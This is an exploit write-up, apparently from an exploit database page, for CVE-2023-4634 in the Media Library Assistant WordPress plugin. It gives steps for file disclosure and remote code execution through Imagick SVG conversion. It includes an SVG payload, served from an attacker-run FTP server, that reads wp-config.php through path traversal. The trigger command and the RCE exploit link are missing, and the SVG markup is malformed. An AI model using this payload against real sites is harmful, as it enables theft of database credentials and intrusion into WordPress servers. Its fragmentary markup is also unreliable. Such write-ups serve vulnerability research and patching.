Media Library Assistant Wordpress Plugin Exploit, RCE and LFI

# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / / @Pepitoh / Twitter @Pepito_oh
# Exploitation path:
# Exploit:
# Vendor Homepage:
# Software Link:
# Version: < 3.10
# Tested on: 3.09
# Description:
# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php


Steps to trigger conversion of a remote SVG

Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references)

Host 2 files :
- malicious.svg
- malicious.svg[1]

For LFI, getting wp-config.php:

Both malicious.svg and malicious.svg[1] on the remote FTP:

<svg width="500" height="500"
<image xlink:href= "text:../../../../wp-config.php" width="500" height="500" />

Then trigger conversion with:

# Directory listing or RCE:
To achieve Directory listing or even RCE, it is a little more complicated.

Use exploit available here:

# Note
Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration).

All rights reserved 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD